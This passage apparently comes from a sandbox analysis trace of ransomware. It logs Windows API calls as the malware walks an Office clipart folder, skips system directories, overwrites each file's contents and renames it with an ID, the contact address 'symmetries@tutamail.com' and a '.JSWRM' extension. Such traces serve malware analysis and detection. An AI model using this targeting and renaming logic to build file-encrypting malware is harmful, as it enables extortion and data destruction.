nFileSizeLow=0x1384, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04384_.WMF", cAlternateFileName="")) returned 1 [0074.356] lstrcmpiW (lpString1="AN04384_.WMF", lpString2=".") returned 1 [0074.357] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="..") returned 1 [0074.357] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="...") returned 1 [0074.357] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="windows") returned -1 [0074.357] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="recovery") returned -1 [0074.357] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="perflogs") returned -1 [0074.357] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="documents and settings") returned -1 [0074.357] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.357] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="system volume information") returned -1 [0074.357] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="msocache") returned -1 [0074.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0074.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04384_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04384_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04384_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0074.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0074.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04384_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04384_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04384_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0074.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.358] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4996) returned 1 [0074.358] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1380) returned 0x24c1d0 [0074.358] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1380, lpOverlapped=0x0) returned 1 [0074.360] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.360] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1380, lpOverlapped=0x0) returned 1 [0074.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.360] CloseHandle (hObject=0x460) returned 1 [0074.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0074.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0074.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0074.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0074.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0074.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.361] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0074.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.361] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x138c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN04385_.WMF", cAlternateFileName="")) returned 1 [0074.361] lstrcmpiW (lpString1="AN04385_.WMF", lpString2=".") returned 1 [0074.361] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="..") returned 1 [0074.361] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="...") returned 1 [0074.361] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="windows") returned -1 [0074.361] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="recovery") returned -1 [0074.361] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="perflogs") returned -1 [0074.362] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="documents and settings") returned -1 [0074.362] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.362] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="system volume information") returned -1 [0074.362] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="msocache") returned -1 [0074.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0074.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04385_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04385_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04385_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0074.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0074.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04385_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN04385_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN04385_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0074.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.362] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5004) returned 1 [0074.362] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1380) returned 0x24c1d0 [0074.362] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1380, lpOverlapped=0x0) returned 1 [0074.364] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.364] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1380, lpOverlapped=0x0) returned 1 [0074.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.364] CloseHandle (hObject=0x460) returned 1 [0074.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0074.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0074.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0074.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0074.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0074.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.365] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0074.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.366] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1cd8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BABY_01.MID", cAlternateFileName="")) returned 1 [0074.366] lstrcmpiW (lpString1="BABY_01.MID", lpString2=".") returned 1 [0074.366] lstrcmpiW (lpString1="BABY_01.MID", lpString2="..") returned 1 [0074.366] lstrcmpiW (lpString1="BABY_01.MID", lpString2="...") returned 1 [0074.366] lstrcmpiW (lpString1="BABY_01.MID", lpString2="windows") returned -1 [0074.366] lstrcmpiW (lpString1="BABY_01.MID", lpString2="recovery") returned -1 [0074.366] lstrcmpiW (lpString1="BABY_01.MID", lpString2="perflogs") returned -1 [0074.366] lstrcmpiW (lpString1="BABY_01.MID", lpString2="documents and settings") returned -1 [0074.366] lstrcmpiW (lpString1="BABY_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0074.366] lstrcmpiW (lpString1="BABY_01.MID", lpString2="system volume information") returned -1 [0074.366] lstrcmpiW (lpString1="BABY_01.MID", lpString2="msocache") returned -1 [0074.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0074.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BABY_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0074.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BABY_01.MID", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BABY_01.MID", lpUsedDefaultChar=0x0) returned 11 [0074.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0074.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0074.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BABY_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0074.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BABY_01.MID", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BABY_01.MID", lpUsedDefaultChar=0x0) returned 11 [0074.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0074.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.367] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7384) returned 1 [0074.367] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1cd0) returned 0x24c1d0 [0074.367] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1cd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1cd0, lpOverlapped=0x0) returned 1 [0074.369] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.369] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1cd0, lpOverlapped=0x0) returned 1 [0074.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.369] CloseHandle (hObject=0x460) returned 1 [0074.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0074.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0074.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0074.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0074.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0074.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.369] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0074.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.370] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1306, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD00116_.WMF", cAlternateFileName="")) returned 1 [0074.370] lstrcmpiW (lpString1="BD00116_.WMF", lpString2=".") returned 1 [0074.370] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="..") returned 1 [0074.370] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="...") returned 1 [0074.370] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="windows") returned -1 [0074.370] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="recovery") returned -1 [0074.370] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="perflogs") returned -1 [0074.370] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="documents and settings") returned -1 [0074.370] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.370] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="system volume information") returned -1 [0074.370] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="msocache") returned -1 [0074.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0074.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00116_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00116_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD00116_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0074.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0074.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD00116_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.371] WideCharToMultiByte (in: 